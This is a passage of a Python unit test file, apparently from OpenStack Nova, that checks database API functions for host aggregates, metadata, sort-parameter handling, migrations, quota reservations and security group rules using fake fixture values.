values['metadata']['fake_key1'] = 'foo'
expected_metadata = copy.deepcopy(values['metadata'])
db.aggregate_update(ctxt, result['id'], values)
metadata = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(metadata, matchers.DictMatches(expected_metadata))
def test_aggregate_update_zone_with_existing_metadata(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
new_zone = {'availability_zone': 'fake_avail_zone_2'}
metadata = _get_fake_aggr_metadata()
metadata.update(new_zone)
db.aggregate_update(ctxt, result['id'], new_zone)
expected = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(metadata, matchers.DictMatches(expected))
def test_aggregate_update_raise_not_found(self):
ctxt = context.get_admin_context()
# this does not exist!
aggregate_id = 1
new_values = _get_fake_aggr_values()
self.assertRaises(exception.AggregateNotFound,
db.aggregate_update, ctxt, aggregate_id, new_values)
def test_aggregate_update_raise_name_exist(self):
ctxt = context.get_admin_context()
_create_aggregate(context=ctxt, values={'name': 'test1'},
metadata={'availability_zone': 'fake_avail_zone'})
_create_aggregate(context=ctxt, values={'name': 'test2'},
metadata={'availability_zone': 'fake_avail_zone'})
aggregate_id = 1
new_values = {'name': 'test2'}
self.assertRaises(exception.AggregateNameExists,
db.aggregate_update, ctxt, aggregate_id, new_values)
def test_aggregate_get_all(self):
ctxt = context.get_admin_context()
counter = 3
for c in range(counter):
_create_aggregate(context=ctxt,
values={'name': 'fake_aggregate_%d' % c},
metadata=None)
results = db.aggregate_get_all(ctxt)
self.assertEqual(len(results), counter)
def test_aggregate_get_all_non_deleted(self):
ctxt = context.get_admin_context()
add_counter = 5
remove_counter = 2
aggregates = []
for c in range(1, add_counter):
values = {'name': 'fake_aggregate_%d' % c}
aggregates.append(_create_aggregate(context=ctxt,
values=values, metadata=None))
for c in range(1, remove_counter):
db.aggregate_delete(ctxt, aggregates[c - 1]['id'])
results = db.aggregate_get_all(ctxt)
self.assertEqual(len(results), add_counter - remove_counter)
def test_aggregate_metadata_add(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata=None)
metadata = _get_fake_aggr_metadata()
db.aggregate_metadata_add(ctxt, result['id'], metadata)
expected = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(metadata, matchers.DictMatches(expected))
def test_aggregate_metadata_add_and_update(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
metadata = _get_fake_aggr_metadata()
key = list(metadata.keys())[0]
new_metadata = {key: 'foo',
'fake_new_key': 'fake_new_value'}
metadata.update(new_metadata)
db.aggregate_metadata_add(ctxt, result['id'], new_metadata)
expected = db.aggregate_metadata_get(ctxt, result['id'])
self.assertThat(metadata, matchers.DictMatches(expected))
def test_aggregate_metadata_add_retry(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata=None)
def counted():
def get_query(context, id, session, read_deleted):
get_query.counter += 1
raise db_exc.DBDuplicateEntry
get_query.counter = 0
return get_query
get_query = counted()
self.stubs.Set(sqlalchemy_api,
'_aggregate_metadata_get_query', get_query)
self.assertRaises(db_exc.DBDuplicateEntry, sqlalchemy_api.
aggregate_metadata_add, ctxt, result['id'], {},
max_retries=5)
self.assertEqual(get_query.counter, 5)
def test_aggregate_metadata_update(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
metadata = _get_fake_aggr_metadata()
key = list(metadata.keys())[0]
db.aggregate_metadata_delete(ctxt, result['id'], key)
new_metadata = {key: 'foo'}
db.aggregate_metadata_add(ctxt, result['id'], new_metadata)
expected = db.aggregate_metadata_get(ctxt, result['id'])
metadata[key] = 'foo'
self.assertThat(metadata, matchers.DictMatches(expected))
def test_aggregate_metadata_delete(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata=None)
metadata = _get_fake_aggr_metadata()
db.aggregate_metadata_add(ctxt, result['id'], metadata)
db.aggregate_metadata_delete(ctxt, result['id'],
list(metadata.keys())[0])
expected = db.aggregate_metadata_get(ctxt, result['id'])
del metadata[list(metadata.keys())[0]]
self.assertThat(metadata, matchers.DictMatches(expected))
def test_aggregate_remove_availability_zone(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt, metadata={'availability_zone':
'fake_avail_zone'})
db.aggregate_metadata_delete(ctxt, result['id'], 'availability_zone')
expected = db.aggregate_metadata_get(ctxt, result['id'])
aggregate = db.aggregate_get(ctxt, result['id'])
self.assertIsNone(aggregate['availability_zone'])
self.assertThat({}, matchers.DictMatches(expected))
def test_aggregate_metadata_delete_raise_not_found(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
self.assertRaises(exception.AggregateMetadataNotFound,
db.aggregate_metadata_delete,
ctxt, result['id'], 'foo_key')
def test_aggregate_host_add(self):
ctxt = context.get_admin_context()
result = _create_aggregate_with_hosts(context=ctxt, metadata=None)
expected = db.aggregate_host_get_all(ctxt, result['id'])
self.assertEqual(_get_fake_aggr_hosts(), expected)
def test_aggregate_host_re_add(self):
ctxt = context.get_admin_context()
result = _create_aggregate_with_hosts(context=ctxt, metadata=None)
host = _get_fake_aggr_hosts()[0]
db.aggregate_host_delete(ctxt, result['id'], host)
db.aggregate_host_add(ctxt, result['id'], host)
expected = db.aggregate_host_get_all(ctxt, result['id'])
self.assertEqual(len(expected), 1)
def test_aggregate_host_add_duplicate_works(self):
ctxt = context.get_admin_context()
r1 = _create_aggregate_with_hosts(context=ctxt, metadata=None)
r2 = _create_aggregate_with_hosts(ctxt,
values={'name': 'fake_aggregate2'},
metadata={'availability_zone': 'fake_avail_zone2'})
h1 = db.aggregate_host_get_all(ctxt, r1['id'])
h2 = db.aggregate_host_get_all(ctxt, r2['id'])
self.assertEqual(h1, h2)
def test_aggregate_host_add_duplicate_raise_exist_exc(self):
ctxt = context.get_admin_context()
result = _create_aggregate_with_hosts(context=ctxt, metadata=None)
self.assertRaises(exception.AggregateHostExists,
db.aggregate_host_add,
ctxt, result['id'], _get_fake_aggr_hosts()[0])
def test_aggregate_host_add_raise_not_found(self):
ctxt = context.get_admin_context()
# this does not exist!
aggregate_id = 1
host = _get_fake_aggr_hosts()[0]
self.assertRaises(exception.AggregateNotFound,
db.aggregate_host_add,
ctxt, aggregate_id, host)
def test_aggregate_host_delete(self):
ctxt = context.get_admin_context()
result = _create_aggregate_with_hosts(context=ctxt, metadata=None)
db.aggregate_host_delete(ctxt, result['id'],
_get_fake_aggr_hosts()[0])
expected = db.aggregate_host_get_all(ctxt, result['id'])
self.assertEqual(0, len(expected))
def test_aggregate_host_delete_raise_not_found(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
self.assertRaises(exception.AggregateHostNotFound,
db.aggregate_host_delete,
ctxt, result['id'], _get_fake_aggr_hosts()[0])
class SqlAlchemyDbApiNoDbTestCase(test.NoDBTestCase):
"""No-DB test class for simple test cases that do not require a backend."""
def test_manual_join_columns_immutable_list(self):
# Tests that _manual_join_columns doesn't modify the list passed in.
columns_to_join = ['system_metadata', 'test']
manual_joins, columns_to_join2 = (
sqlalchemy_api._manual_join_columns(columns_to_join))
self.assertEqual(['system_metadata'], manual_joins)
self.assertEqual(['test'], columns_to_join2)
self.assertEqual(['system_metadata', 'test'], columns_to_join)
def test_convert_objects_related_datetimes(self):
t1 = timeutils.utcnow()
t2 = t1 + datetime.timedelta(seconds=10)
t3 = t2 + datetime.timedelta(hours=1)
t2_utc = t2.replace(tzinfo=iso8601.iso8601.Utc())
t3_utc = t3.replace(tzinfo=iso8601.iso8601.Utc())
datetime_keys = ('created_at', 'deleted_at')
test1 = {'created_at': t1, 'deleted_at': t2, 'updated_at': t3}
expected_dict = {'created_at': t1, 'deleted_at': t2, 'updated_at': t3}
sqlalchemy_api.convert_objects_related_datetimes(test1, *datetime_keys)
self.assertEqual(test1, expected_dict)
test2 = {'created_at': t1, 'deleted_at': t2_utc, 'updated_at': t3}
expected_dict = {'created_at': t1, 'deleted_at': t2, 'updated_at': t3}
sqlalchemy_api.convert_objects_related_datetimes(test2, *datetime_keys)
self.assertEqual(test2, expected_dict)
test3 = {'deleted_at': t2_utc, 'updated_at': t3_utc}
expected_dict = {'deleted_at': t2, 'updated_at': t3_utc}
sqlalchemy_api.convert_objects_related_datetimes(test3, *datetime_keys)
self.assertEqual(test3, expected_dict)
def test_convert_objects_related_datetimes_with_strings(self):
t1 = '2015-05-28T17:15:53.000000'
t2 = '2012-04-21T18:25:43-05:00'
t3 = '2012-04-23T18:25:43.511Z'
datetime_keys = ('created_at', 'deleted_at', 'updated_at')
test1 = {'created_at': t1, 'deleted_at': t2, 'updated_at': t3}
expected_dict = {
'created_at': timeutils.parse_strtime(t1).replace(tzinfo=None),
'deleted_at': timeutils.parse_isotime(t2).replace(tzinfo=None),
'updated_at': timeutils.parse_isotime(t3).replace(tzinfo=None)}
sqlalchemy_api.convert_objects_related_datetimes(test1)
self.assertEqual(test1, expected_dict)
sqlalchemy_api.convert_objects_related_datetimes(test1, *datetime_keys)
self.assertEqual(test1, expected_dict)
def test_get_regexp_op_for_database_sqlite(self):
op = sqlalchemy_api._get_regexp_op_for_connection('sqlite:///')
self.assertEqual('REGEXP', op)
def test_get_regexp_op_for_database_mysql(self):
op = sqlalchemy_api._get_regexp_op_for_connection(
'mysql+pymysql://root@localhost')
self.assertEqual('REGEXP', op)
def test_get_regexp_op_for_database_postgresql(self):
op = sqlalchemy_api._get_regexp_op_for_connection(
'postgresql://localhost')
self.assertEqual('~', op)
def test_get_regexp_op_for_database_unknown(self):
op = sqlalchemy_api._get_regexp_op_for_connection('notdb:///')
self.assertEqual('LIKE', op)
@mock.patch.object(sqlalchemy_api, '_create_facade_lazily')
def test_get_engine(self, mock_create_facade):
mock_facade = mock.MagicMock()
mock_create_facade.return_value = mock_facade
sqlalchemy_api.get_engine()
mock_create_facade.assert_called_once_with(sqlalchemy_api._MAIN_FACADE,
CONF.database)
mock_facade.get_engine.assert_called_once_with(use_slave=False)
@mock.patch.object(sqlalchemy_api, '_create_facade_lazily')
def test_get_api_engine(self, mock_create_facade):
mock_facade = mock.MagicMock()
mock_create_facade.return_value = mock_facade
sqlalchemy_api.get_api_engine()
mock_create_facade.assert_called_once_with(sqlalchemy_api._API_FACADE,
CONF.api_database)
mock_facade.get_engine.assert_called_once_with()
@mock.patch.object(sqlalchemy_api, '_create_facade_lazily')
def test_get_session(self, mock_create_facade):
mock_facade = mock.MagicMock()
mock_create_facade.return_value = mock_facade
sqlalchemy_api.get_session()
mock_create_facade.assert_called_once_with(sqlalchemy_api._MAIN_FACADE,
CONF.database)
mock_facade.get_session.assert_called_once_with(use_slave=False)
@mock.patch.object(sqlalchemy_api, '_create_facade_lazily')
def test_get_api_session(self, mock_create_facade):
mock_facade = mock.MagicMock()
mock_create_facade.return_value = mock_facade
sqlalchemy_api.get_api_session()
mock_create_facade.assert_called_once_with(sqlalchemy_api._API_FACADE,
CONF.api_database)
mock_facade.get_session.assert_called_once_with()
class SqlAlchemyDbApiTestCase(DbTestCase):
def test_instance_get_all_by_host(self):
ctxt = context.get_admin_context()
self.create_instance_with_args()
self.create_instance_with_args()
self.create_instance_with_args(host='host2')
result = sqlalchemy_api._instance_get_all_uuids_by_host(ctxt, 'host1')
self.assertEqual(2, len(result))
def test_instance_get_all_uuids_by_host(self):
ctxt = context.get_admin_context()
self.create_instance_with_args()
self.create_instance_with_args()
self.create_instance_with_args(host='host2')
result = sqlalchemy_api._instance_get_all_uuids_by_host(ctxt, 'host1')
self.assertEqual(2, len(result))
self.assertEqual(six.text_type, type(result[0]))
def test_instance_get_active_by_window_joined(self):
now = datetime.datetime(2013, 10, 10, 17, 16, 37, 156701)
start_time = now - datetime.timedelta(minutes=10)
now1 = now + datetime.timedelta(minutes=1)
now2 = now + datetime.timedelta(minutes=2)
now3 = now + datetime.timedelta(minutes=3)
ctxt = context.get_admin_context()
# used for testing columns_to_join
network_info = jsonutils.dumps({'ckey': 'cvalue'})
sample_data = {
'metadata': {'mkey1': 'mval1', 'mkey2': 'mval2'},
'system_metadata': {'smkey1': 'smval1', 'smkey2': 'smval2'},
'info_cache': {'network_info': network_info},
}
self.create_instance_with_args(launched_at=now, **sample_data)
self.create_instance_with_args(launched_at=now1, terminated_at=now2,
**sample_data)
self.create_instance_with_args(launched_at=now2, terminated_at=now3,
**sample_data)
self.create_instance_with_args(launched_at=now3, terminated_at=None,
**sample_data)
result = sqlalchemy_api.instance_get_active_by_window_joined(
ctxt, begin=now)
self.assertEqual(4, len(result))
# verify that all default columns are joined
meta = utils.metadata_to_dict(result[0]['metadata'])
self.assertEqual(sample_data['metadata'], meta)
sys_meta = utils.metadata_to_dict(result[0]['system_metadata'])
self.assertEqual(sample_data['system_metadata'], sys_meta)
self.assertIn('info_cache', result[0])
result = sqlalchemy_api.instance_get_active_by_window_joined(
ctxt, begin=now3, columns_to_join=['info_cache'])
self.assertEqual(2, len(result))
# verify that only info_cache is loaded
meta = utils.metadata_to_dict(result[0]['metadata'])
self.assertEqual({}, meta)
self.assertIn('info_cache', result[0])
result = sqlalchemy_api.instance_get_active_by_window_joined(
ctxt, begin=start_time, end=now)
self.assertEqual(0, len(result))
result = sqlalchemy_api.instance_get_active_by_window_joined(
ctxt, begin=start_time, end=now2,
columns_to_join=['system_metadata'])
self.assertEqual(2, len(result))
# verify that only system_metadata is loaded
meta = utils.metadata_to_dict(result[0]['metadata'])
self.assertEqual({}, meta)
sys_meta = utils.metadata_to_dict(result[0]['system_metadata'])
self.assertEqual(sample_data['system_metadata'], sys_meta)
self.assertNotIn('info_cache', result[0])
result = sqlalchemy_api.instance_get_active_by_window_joined(
ctxt, begin=now2, end=now3,
columns_to_join=['metadata', 'info_cache'])
self.assertEqual(2, len(result))
# verify that only metadata and info_cache are loaded
meta = utils.metadata_to_dict(result[0]['metadata'])
self.assertEqual(sample_data['metadata'], meta)
sys_meta = utils.metadata_to_dict(result[0]['system_metadata'])
self.assertEqual({}, sys_meta)
self.assertIn('info_cache', result[0])
self.assertEqual(network_info, result[0]['info_cache']['network_info'])
@mock.patch('nova.db.sqlalchemy.api.instance_get_all_by_filters_sort')
def test_instance_get_all_by_filters_calls_sort(self,
mock_get_all_filters_sort):
'''Verifies instance_get_all_by_filters calls the sort function.'''
# sort parameters should be wrapped in a list, all other parameters
# should be passed through
ctxt = context.get_admin_context()
sqlalchemy_api.instance_get_all_by_filters(ctxt, {'foo': 'bar'},
'sort_key', 'sort_dir', limit=100, marker='uuid',
columns_to_join='columns', use_slave=True)
mock_get_all_filters_sort.assert_called_once_with(ctxt, {'foo': 'bar'},
limit=100, marker='uuid', columns_to_join='columns',
use_slave=True, sort_keys=['sort_key'], sort_dirs=['sort_dir'])
def test_instance_get_all_by_filters_sort_key_invalid(self):
'''InvalidSortKey raised if an invalid key is given.'''
for keys in [['foo'], ['uuid', 'foo']]:
self.assertRaises(exception.InvalidSortKey,
db.instance_get_all_by_filters_sort,
self.context,
filters={},
sort_keys=keys)
class ProcessSortParamTestCase(test.TestCase):
def test_process_sort_params_defaults(self):
'''Verifies default sort parameters.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params([], [])
self.assertEqual(['created_at', 'id'], sort_keys)
self.assertEqual(['asc', 'asc'], sort_dirs)
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(None, None)
self.assertEqual(['created_at', 'id'], sort_keys)
self.assertEqual(['asc', 'asc'], sort_dirs)
def test_process_sort_params_override_default_keys(self):
'''Verifies that the default keys can be overridden.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_keys=['key1', 'key2', 'key3'])
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['asc', 'asc', 'asc'], sort_dirs)
def test_process_sort_params_override_default_dir(self):
'''Verifies that the default direction can be overridden.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_dir='dir1')
self.assertEqual(['created_at', 'id'], sort_keys)
self.assertEqual(['dir1', 'dir1'], sort_dirs)
def test_process_sort_params_override_default_key_and_dir(self):
'''Verifies that the default key and dir can be overridden.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_keys=['key1', 'key2', 'key3'],
default_dir='dir1')
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['dir1', 'dir1', 'dir1'], sort_dirs)
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_keys=[], default_dir='dir1')
self.assertEqual([], sort_keys)
self.assertEqual([], sort_dirs)
def test_process_sort_params_non_default(self):
'''Verifies that non-default keys are added correctly.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['key1', 'key2'], ['asc', 'desc'])
self.assertEqual(['key1', 'key2', 'created_at', 'id'], sort_keys)
# First sort_dir in list is used when adding the default keys
self.assertEqual(['asc', 'desc', 'asc', 'asc'], sort_dirs)
def test_process_sort_params_default(self):
'''Verifies that default keys are added correctly.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], ['asc', 'desc'])
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['asc', 'desc', 'asc'], sort_dirs)
# Include default key value, rely on default direction
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], [])
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['asc', 'asc', 'asc'], sort_dirs)
def test_process_sort_params_default_dir(self):
'''Verifies that the default dir is applied to all keys.'''
# Direction is set, ignore default dir
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], ['desc'], default_dir='dir')
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['desc', 'desc', 'desc'], sort_dirs)
# But should be used if no direction is set
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], [], default_dir='dir')
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['dir', 'dir', 'dir'], sort_dirs)
def test_process_sort_params_unequal_length(self):
'''Verifies that a sort direction list is applied correctly.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2', 'key3'], ['desc'])
self.assertEqual(['id', 'key2', 'key3', 'created_at'], sort_keys)
self.assertEqual(['desc', 'desc', 'desc', 'desc'], sort_dirs)
# Default direction is the first key in the list
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2', 'key3'], ['desc', 'asc'])
self.assertEqual(['id', 'key2', 'key3', 'created_at'], sort_keys)
self.assertEqual(['desc', 'asc', 'desc', 'desc'], sort_dirs)
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2', 'key3'], ['desc', 'asc', 'asc'])
self.assertEqual(['id', 'key2', 'key3', 'created_at'], sort_keys)
self.assertEqual(['desc', 'asc', 'asc', 'desc'], sort_dirs)
def test_process_sort_params_extra_dirs_lengths(self):
'''InvalidInput raised if more directions are given.'''
self.assertRaises(exception.InvalidInput,
sqlalchemy_api.process_sort_params,
['key1', 'key2'],
['asc', 'desc', 'desc'])
def test_process_sort_params_invalid_sort_dir(self):
'''InvalidInput raised if invalid directions are given.'''
for dirs in [['foo'], ['asc', 'foo'], ['asc', 'desc', 'foo']]:
self.assertRaises(exception.InvalidInput,
sqlalchemy_api.process_sort_params,
['key'],
dirs)
class MigrationTestCase(test.TestCase):
def setUp(self):
super(MigrationTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self._create()
self._create()
self._create(status='reverted')
self._create(status='confirmed')
self._create(status='error')
self._create(source_compute='host2', source_node='b',
dest_compute='host1', dest_node='a')
self._create(source_compute='host2', dest_compute='host3')
self._create(source_compute='host3', dest_compute='host4')
def _create(self, status='migrating', source_compute='host1',
source_node='a', dest_compute='host2', dest_node='b',
system_metadata=None, migration_type=None):
values = {'host': source_compute}
instance = db.instance_create(self.ctxt, values)
if system_metadata:
db.instance_system_metadata_update(self.ctxt, instance['uuid'],
system_metadata, False)
values = {'status': status, 'source_compute': source_compute,
'source_node': source_node, 'dest_compute': dest_compute,
'dest_node': dest_node, 'instance_uuid': instance['uuid'],
'migration_type': migration_type}
db.migration_create(self.ctxt, values)
def _assert_in_progress(self, migrations):
for migration in migrations:
self.assertNotEqual('confirmed', migration['status'])
self.assertNotEqual('reverted', migration['status'])
self.assertNotEqual('error', migration['status'])
def test_migration_get_in_progress_joins(self):
self._create(source_compute='foo', system_metadata={'foo': 'bar'})
migrations = db.migration_get_in_progress_by_host_and_node(self.ctxt,
'foo', 'a')
system_metadata = migrations[0]['instance']['system_metadata'][0]
self.assertEqual(system_metadata['key'], 'foo')
self.assertEqual(system_metadata['value'], 'bar')
def test_in_progress_host1_nodea(self):
migrations = db.migration_get_in_progress_by_host_and_node(self.ctxt,
'host1', 'a')
# 2 as source + 1 as dest
self.assertEqual(3, len(migrations))
self._assert_in_progress(migrations)
def test_in_progress_host1_nodeb(self):
migrations = db.migration_get_in_progress_by_host_and_node(self.ctxt,
'host1', 'b')
# some migrations are to/from host1, but none with a node 'b'
self.assertEqual(0, len(migrations))
def test_in_progress_host2_nodeb(self):
migrations = db.migration_get_in_progress_by_host_and_node(self.ctxt,
'host2', 'b')
# 2 as dest, 1 as source
self.assertEqual(3, len(migrations))
self._assert_in_progress(migrations)
def test_instance_join(self):
migrations = db.migration_get_in_progress_by_host_and_node(self.ctxt,
'host2', 'b')
for migration in migrations:
instance = migration['instance']
self.assertEqual(migration['instance_uuid'], instance['uuid'])
def test_get_migrations_by_filters(self):
filters = {"status": "migrating", "host": "host3",
"migration_type": None, "hidden": False}
migrations = db.migration_get_all_by_filters(self.ctxt, filters)
self.assertEqual(2, len(migrations))
for migration in migrations:
self.assertEqual(filters["status"], migration['status'])
hosts = [migration['source_compute'], migration['dest_compute']]
self.assertIn(filters["host"], hosts)
def test_get_migrations_by_filters_with_type(self):
self._create(status="special", source_compute="host9",
migration_type="evacuation")
self._create(status="special", source_compute="host9",
migration_type="live-migration")
filters = {"status": "special", "host": "host9",
"migration_type": "evacuation", "hidden": False}
migrations = db.migration_get_all_by_filters(self.ctxt, filters)
self.assertEqual(1, len(migrations))
def test_get_migrations_by_filters_source_compute(self):
filters = {'source_compute': 'host2'}
migrations = db.migration_get_all_by_filters(self.ctxt, filters)
self.assertEqual(2, len(migrations))
sources = [x['source_compute'] for x in migrations]
self.assertEqual(['host2', 'host2'], sources)
dests = [x['dest_compute'] for x in migrations]
self.assertEqual(['host1', 'host3'], dests)
def test_migration_get_unconfirmed_by_dest_compute(self):
# Ensure no migrations are returned.
results = db.migration_get_unconfirmed_by_dest_compute(self.ctxt, 10,
'fake_host')
self.assertEqual(0, len(results))
# Ensure no migrations are returned.
results = db.migration_get_unconfirmed_by_dest_compute(self.ctxt, 10,
'fake_host2')
self.assertEqual(0, len(results))
updated_at = datetime.datetime(2000, 1, 1, 12, 0, 0)
values = {"status": "finished", "updated_at": updated_at,
"dest_compute": "fake_host2"}
migration = db.migration_create(self.ctxt, values)
# Ensure different host is not returned
results = db.migration_get_unconfirmed_by_dest_compute(self.ctxt, 10,
'fake_host')
self.assertEqual(0, len(results))
# Ensure one migration older than 10 seconds is returned.
results = db.migration_get_unconfirmed_by_dest_compute(self.ctxt, 10,
'fake_host2')
self.assertEqual(1, len(results))
db.migration_update(self.ctxt, migration['id'],
{"status": "CONFIRMED"})
# Ensure the new migration is not returned.
updated_at = timeutils.utcnow()
values = {"status": "finished", "updated_at": updated_at,
"dest_compute": "fake_host2"}
migration = db.migration_create(self.ctxt, values)
results = db.migration_get_unconfirmed_by_dest_compute(self.ctxt, 10,
"fake_host2")
self.assertEqual(0, len(results))
db.migration_update(self.ctxt, migration['id'],
{"status": "CONFIRMED"})
def test_migration_update_not_found(self):
self.assertRaises(exception.MigrationNotFound,
db.migration_update, self.ctxt, 42, {})
class ModelsObjectComparatorMixin(object):
def _dict_from_object(self, obj, ignored_keys):
if ignored_keys is None:
ignored_keys = []
if isinstance(obj, dict):
obj_items = obj.items()
else:
obj_items = obj.iteritems()
return {k: v for k, v in obj_items
if k not in ignored_keys}
def _assertEqualObjects(self, obj1, obj2, ignored_keys=None):
obj1 = self._dict_from_object(obj1, ignored_keys)
obj2 = self._dict_from_object(obj2, ignored_keys)
self.assertEqual(len(obj1),
len(obj2),
"Keys mismatch: %s" %
str(set(obj1.keys()) ^ set(obj2.keys())))
for key, value in obj1.items():
self.assertEqual(value, obj2[key])
def _assertEqualListsOfObjects(self, objs1, objs2, ignored_keys=None):
obj_to_dict = lambda o: self._dict_from_object(o, ignored_keys)
sort_key = lambda d: [d[k] for k in sorted(d)]
conv_and_sort = lambda obj: sorted(map(obj_to_dict, obj), key=sort_key)
self.assertEqual(conv_and_sort(objs1), conv_and_sort(objs2))
def _assertEqualOrderedListOfObjects(self, objs1, objs2,
ignored_keys=None):
obj_to_dict = lambda o: self._dict_from_object(o, ignored_keys)
conv = lambda objs: [obj_to_dict(obj) for obj in objs]
self.assertEqual(conv(objs1), conv(objs2))
def _assertEqualListsOfPrimitivesAsSets(self, primitives1, primitives2):
self.assertEqual(len(primitives1), len(primitives2))
for primitive in primitives1:
self.assertIn(primitive, primitives2)
for primitive in primitives2:
self.assertIn(primitive, primitives1)
class InstanceSystemMetadataTestCase(test.TestCase):
"""Tests for db.api.instance_system_metadata_* methods."""
def setUp(self):
super(InstanceSystemMetadataTestCase, self).setUp()
values = {'host': 'h1', 'project_id': 'p1',
'system_metadata': {'key': 'value'}}
self.ctxt = context.get_admin_context()
self.instance = db.instance_create(self.ctxt, values)
def test_instance_system_metadata_get(self):
metadata = db.instance_system_metadata_get(self.ctxt,
self.instance['uuid'])
self.assertEqual(metadata, {'key': 'value'})
def test_instance_system_metadata_update_new_pair(self):
db.instance_system_metadata_update(
self.ctxt, self.instance['uuid'],
{'new_key': 'new_value'}, False)
metadata = db.instance_system_metadata_get(self.ctxt,
self.instance['uuid'])
self.assertEqual(metadata, {'key': 'value', 'new_key': 'new_value'})
def test_instance_system_metadata_update_existent_pair(self):
db.instance_system_metadata_update(
self.ctxt, self.instance['uuid'],
{'key': 'new_value'}, True)
metadata = db.instance_system_metadata_get(self.ctxt,
self.instance['uuid'])
self.assertEqual(metadata, {'key': 'new_value'})
def test_instance_system_metadata_update_delete_true(self):
db.instance_system_metadata_update(
self.ctxt, self.instance['uuid'],
{'new_key': 'new_value'}, True)
metadata = db.instance_system_metadata_get(self.ctxt,
self.instance['uuid'])
self.assertEqual(metadata, {'new_key': 'new_value'})
@test.testtools.skip("bug 1189462")
def test_instance_system_metadata_update_nonexistent(self):
self.assertRaises(exception.InstanceNotFound,
db.instance_system_metadata_update,
self.ctxt, 'nonexistent-uuid',
{'key': 'value'}, True)
class ReservationTestCase(test.TestCase, ModelsObjectComparatorMixin):
"""Tests for db.api.reservation_* methods."""
def setUp(self):
super(ReservationTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.reservations = _quota_reserve(self.ctxt, 'project1', 'user1')
usage = db.quota_usage_get(self.ctxt, 'project1', 'resource1', 'user1')
self.values = {'uuid': 'sample-uuid',
'project_id': 'project1',
'user_id': 'user1',
'resource': 'resource1',
'delta': 42,
'expire': timeutils.utcnow() + datetime.timedelta(days=1),
'usage': {'id': usage.id}}
def test_reservation_commit(self):
expected = {'project_id': 'project1', 'user_id': 'user1',
'resource0': {'reserved': 0, 'in_use': 0},
'resource1': {'reserved': 1, 'in_use': 1},
'fixed_ips': {'reserved': 2, 'in_use': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'))
_reservation_get(self.ctxt, self.reservations[0])
db.reservation_commit(self.ctxt, self.reservations, 'project1',
'user1')
self.assertRaises(exception.ReservationNotFound,
_reservation_get, self.ctxt, self.reservations[0])
expected = {'project_id': 'project1', 'user_id': 'user1',
'resource0': {'reserved': 0, 'in_use': 0},
'resource1': {'reserved': 0, 'in_use': 2},
'fixed_ips': {'reserved': 0, 'in_use': 4}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'))
def test_reservation_rollback(self):
expected = {'project_id': 'project1', 'user_id': 'user1',
'resource0': {'reserved': 0, 'in_use': 0},
'resource1': {'reserved': 1, 'in_use': 1},
'fixed_ips': {'reserved': 2, 'in_use': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'))
_reservation_get(self.ctxt, self.reservations[0])
db.reservation_rollback(self.ctxt, self.reservations, 'project1',
'user1')
self.assertRaises(exception.ReservationNotFound,
_reservation_get, self.ctxt, self.reservations[0])
expected = {'project_id': 'project1', 'user_id': 'user1',
'resource0': {'reserved': 0, 'in_use': 0},
'resource1': {'reserved': 0, 'in_use': 1},
'fixed_ips': {'reserved': 0, 'in_use': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'))
def test_reservation_expire(self):
db.reservation_expire(self.ctxt)
expected = {'project_id': 'project1', 'user_id': 'user1',
'resource0': {'reserved': 0, 'in_use': 0},
'resource1': {'reserved': 0, 'in_use': 1},
'fixed_ips': {'reserved': 0, 'in_use': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'))
class SecurityGroupRuleTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(SecurityGroupRuleTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_base_values(self):
return {
'name': 'fake_sec_group',
'description': 'fake_sec_group_descr',
'user_id': 'fake',
'project_id': 'fake',
'instances': []
}
def _get_base_rule_values(self):
return {
'protocol': "tcp",
'from_port': 80,
'to_port': 8080,
'cidr': None,
'deleted': 0,
'deleted_at': None,
'grantee_group': None,
